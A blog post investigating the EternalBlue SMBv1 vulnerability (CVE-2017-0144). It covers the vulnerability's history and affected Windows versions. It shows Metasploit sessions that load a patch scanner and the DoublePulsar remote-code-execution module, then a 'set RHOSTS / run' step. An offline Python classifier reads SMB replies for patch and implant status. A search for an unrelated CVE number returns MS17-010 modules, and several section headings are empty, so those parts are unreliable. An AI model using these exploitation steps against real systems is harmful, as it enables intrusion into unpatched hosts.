CVE-2017-0144 Investigation

7erry

Among the many critical 0day vulnerabilities that surfaced in 2017, the so-called "first year of cybersecurity", the most representative is without doubt CVE-2017-0144, better known as "Eternal Blue". In 2016 the hacker group Shadow Brokers broke into Equation Group, the NSA's own hacking unit, and obtained part of its leaked arsenal. Shadow Brokers originally intended to sell the weapons for 1 million bitcoin, but nobody paid. On 14 April 2017 Shadow Brokers published the arsenal, exposing a large number of attack tools for Windows 0day vulnerabilities, among them the Eternal Blue exploit. On 12 May 2017 criminals reworked the Eternal Blue exploit into the "WannaCry" ransomware. The worm spread rapidly across the globe, attacking and infecting more than 200,000 computers and affecting thousands of organisations in at least 150 countries, including hospitals, banks, telecoms, ISPs and other critical infrastructure, and causing enormous economic losses and social disruption. The breadth of its spread, the scale of its impact, the extent of the damage and the malice of the act made this incident a landmark and milestone of 21st-century cybersecurity.

Microsoft, who ended up taking the blame, had in fact pushed the MS17-010 security patch on 14 March 2017, yet that did not stop the worm from running wild two months later. Clearly the root cause of this far-reaching security incident was not merely a matter of software security technology.

Affected scope

The SMBv1 server in
Microsoft Windows Vista SP2
Windows Server 2008 SP2 and R2 SP1
Windows 7 SP1
Windows 8.1
Windows Server 2012 Gold and R2
Windows RT 8.1
Windows 10 Gold, 1511, and 1607
Windows Server 2016

Vulnerability analysis

Exploitation

Scanning for the vulnerability with MSF

msfconsole
msf6 > search scanner eternalblue

Search results

Matching Modules
================

   #   Name                                  Disclosure Date  Rank    Check  Description
   -   ----                                  ---------------  ----    -----  -----------
   0   auxiliary/scanner/smb/smb_ms17_010    .                normal  No     MS17-010 SMB RCE Detection
   1     \_ AKA: DOUBLEPULSAR                .                .       .      .
   2     \_ AKA: ETERNALBLUE                 .                .       .      .


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/smb/smb_ms17_010

Load the scanner and view its details

msf6 exploit(windows/smb/smb_doublepulsar_rce) > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > info

Scanner details

Name: MS17-010 SMB RCE Detection
Module: auxiliary/scanner/smb/smb_ms17_010
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Sean Dillon <sean.dillon@risksense.com>
Luke Jennings

Check supported:
No

Basic options:
  Name         Current Setting                                                 Required  Description
  ----         ---------------                                                 --------  -----------
  CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
  CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
  CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
  NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
  RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT        445                                                             yes       The SMB service port (TCP)
  SMBDomain    .                                                               no        The Windows domain to use for authentication
  SMBPass                                                                      no        The password for the specified username
  SMBUser                                                                      no        The username to authenticate as
  THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Description:
Uses information disclosure to determine if MS17-010 has been patched or not.
Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.
If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does
not have the MS17-010 patch.

If the machine is missing the MS17-010 patch, the module will check for an
existing DoublePulsar (ring 0 shellcode/malware) infection.

This module does not require valid SMB credentials in default server
configurations. It can log on as the user "\" and connect to IPC$.

References:
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://nvd.nist.gov/vuln/detail/CVE-2017-0145
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://nvd.nist.gov/vuln/detail/CVE-2017-0148
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
https://github.com/countercept/doublepulsar-detection-script
https://web.archive.org/web/20170513050203/https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Also known as:
DOUBLEPULSAR
ETERNALBLUE


View the full module info with the info -d command.
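The Description above keys the vulnerable/patched decision on the NT status of a single SMBv1 reply to a transaction on FID 0, and the DoublePulsar check on a second probe. As an added example (not the Metasploit module's code), the Python below parses an SMBv1 header and applies those two decisions to replies constructed inline, so it runs offline; the same functions can be pointed at replies carved from a capture. The statuses it treats as "patched" and the MID 0x41/0x51 convention for the DoublePulsar probe are taken from the public scanner logic and the countercept detection script the module references, not from this page, and are marked as such in the code.

```python
"""Interpret SMBv1 replies the way the smb_ms17_010 scanner's Description explains.

Added example, not the Metasploit module's code. Nothing here touches the
network: the replies below are constructed inline (header only).
"""
import struct
from typing import NamedTuple

# NT status the module's Description names for an unpatched host.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
# Statuses a patched host returns to the same request (assumption taken from
# the public scanner logic, not stated on the page).
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022

SMB_COM_TRANSACTION = 0x25   # the "transaction on FID 0" the scanner sends
SMB_COM_TRANSACTION2 = 0x32  # the Trans2 request used for the DoublePulsar probe

# DoublePulsar presence check as in the countercept detection script the module
# references: a Trans2 SESSION_SETUP sent with MID 0x41 comes back with MID 0x51
# when the implant is hooked into the SMB driver (assumption, not from the page).
MID_CLEAN = 0x41
MID_IMPLANT = 0x51


class SmbHeader(NamedTuple):
    command: int
    status: int
    flags: int
    flags2: int
    tid: int
    pid: int
    uid: int
    mid: int


def parse_smb1_header(packet: bytes) -> SmbHeader:
    """Parse a 4-byte NetBIOS session header followed by the 32-byte SMBv1 header."""
    if len(packet) < 36:
        raise ValueError("packet too short for NetBIOS + SMBv1 header")
    if packet[0] != 0x00 or int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    hdr = packet[4:36]
    if hdr[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 header")
    # Little-endian: command, NT status, flags, flags2, PIDHigh, signature,
    # two reserved bytes, TID, PID, UID, MID.
    command, status, flags, flags2, _pid_high, _sig, tid, pid, uid, mid = struct.unpack(
        "<BIBHH8s2xHHHH", hdr[4:]
    )
    return SmbHeader(command, status, flags, flags2, tid, pid, uid, mid)


def classify_fid0_transaction(packet: bytes) -> str:
    """Read the reply to the scanner's transaction on FID 0 (see the Description)."""
    h = parse_smb1_header(packet)
    if h.command != SMB_COM_TRANSACTION:
        return "unexpected command 0x%02x" % h.command
    if h.status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE: MS17-010 patch missing"
    if h.status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "not vulnerable: host appears patched"
    return "undetermined: status 0x%08x" % h.status


def classify_doublepulsar_probe(packet: bytes) -> str:
    """Read the reply to the Trans2 SESSION_SETUP probe sent with MID 0x41."""
    h = parse_smb1_header(packet)
    if h.command != SMB_COM_TRANSACTION2:
        return "unexpected command 0x%02x" % h.command
    if h.mid == MID_IMPLANT:
        return "INFECTED: DOUBLEPULSAR implant answered"
    if h.mid == MID_CLEAN:
        return "clean: no implant response"
    return "undetermined: MID 0x%04x" % h.mid


def build_smb1_reply(command: int, status: int, mid: int) -> bytes:
    """Constructed sample reply (header only), used as offline input below."""
    hdr = b"\xffSMB" + struct.pack(
        "<BIBHH8s2xHHHH",
        command, status,
        0x98,          # flags: reply bit set
        0xC807,        # flags2: unicode, NT status codes, long names
        0, b"\x00" * 8,
        0x0800, 0xFEFF, 0x0800,  # TID, PID, UID
        mid,
    )
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


# Constructed samples, not captured traffic.
SAMPLE_UNPATCHED = build_smb1_reply(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES, 0x40)
SAMPLE_PATCHED = build_smb1_reply(SMB_COM_TRANSACTION, STATUS_ACCESS_DENIED, 0x40)
SAMPLE_IMPLANT = build_smb1_reply(SMB_COM_TRANSACTION2, 0, MID_IMPLANT)
SAMPLE_CLEAN = build_smb1_reply(SMB_COM_TRANSACTION2, 0, MID_CLEAN)

if __name__ == "__main__":
    for label, pkt, fn in (
        ("unpatched", SAMPLE_UNPATCHED, classify_fid0_transaction),
        ("patched", SAMPLE_PATCHED, classify_fid0_transaction),
        ("implant", SAMPLE_IMPLANT, classify_doublepulsar_probe),
        ("clean", SAMPLE_CLEAN, classify_doublepulsar_probe),
    ):
        print(f"{label:10s} {fn(pkt)}")
```

The two classifiers are deliberately separate: the FID 0 transaction tells you whether the patch is present, while the Trans2 probe tells you whether something is already living in the SMB driver, and the scanner only runs the second when the first says the host is unpatched.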

Searching for an exploit for the vulnerability

msf6 > search CVE-2010-3333

Search results

Matching Modules
================

   #   Name                                            Disclosure Date  Rank     Check  Description
   -   ----                                            ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue        2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                   .                .        .      .
   2     \_ target: Windows 7                          .                .        .      .
   3     \_ target: Windows Embedded Standard 7        .                .        .      .
   4     \_ target: Windows Server 2008 R2             .                .        .      .
   5     \_ target: Windows 8                          .                .        .      .
   6     \_ target: Windows 8.1                        .                .        .      .
   7     \_ target: Windows Server 2012                .                .        .      .
   8     \_ target: Windows 10 Pro                     .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation   .                .        .      .
   10  auxiliary/scanner/smb/smb_ms17_010              .                normal   No     MS17-010 SMB RCE Detection
   11    \_ AKA: DOUBLEPULSAR                          .                .        .      .
   12    \_ AKA: ETERNALBLUE                           .                .        .      .
   13  exploit/windows/smb/smb_doublepulsar_rce        2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   14    \_ target: Execute payload (x64)              .                .        .      .
   15    \_ target: Neutralize implant                 .                .        .      .


Interact with a module by name or index. For example info 15, use 15 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

Load the module and view its details

msf6 > use exploit/windows/smb/smb_doublepulsar_rce
msf6 exploit(windows/smb/smb_doublepulsar_rce) > info

Module details

Name: SMB DOUBLEPULSAR Remote Code Execution
Module: exploit/windows/smb/smb_doublepulsar_rce
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2017-04-14

Provided by:
Equation Group
Shadow Brokers
zerosum0x0
Luke Jennings
wvu <wvu@metasploit.com>
Jacob Robles

Module stability:
crash-os-down

Module reliability:
repeatable-session

Available targets:
Id Name
-- ----
=> 0 Execute payload (x64)
1 Neutralize implant

Check supported:
Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT   445              yes       The SMB service port (TCP)

Payload information:
Space: 3316

Description:
This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

While this module primarily performs code execution against the implant,
the "Neutralize implant" target allows you to disable the implant.

References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://nvd.nist.gov/vuln/detail/CVE-2017-0145
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://nvd.nist.gov/vuln/detail/CVE-2017-0148
https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/
https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
https://github.com/countercept/doublepulsar-detection-script
https://github.com/countercept/doublepulsar-c2-traffic-decryptor
https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1

Also known as:
DOUBLEPULSAR

Related modules:
auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_eternalblue


View the full module info with the info -d command.

Using the module / scanner

set RHOSTS TARGET_IP
run

Exploit analysis

Vulnerability fix

Reference

Microsoft Security Bulletin MS17-010 - Critical
NVD - CVE-2017-0144
CVE - CVE-2017-0144

  • Title: CVE-2017-0144 Investigation
  • Author: 7erry
  • Created: 2025-07-07 18:19:46
  • Updated: 2025-07-07 18:19:46
  • Link: https://7erryx.github.io/2025/07/07/CVE-2017-0144-Investigation/
  • License: This work is licensed under CC BY-NC-SA 4.0.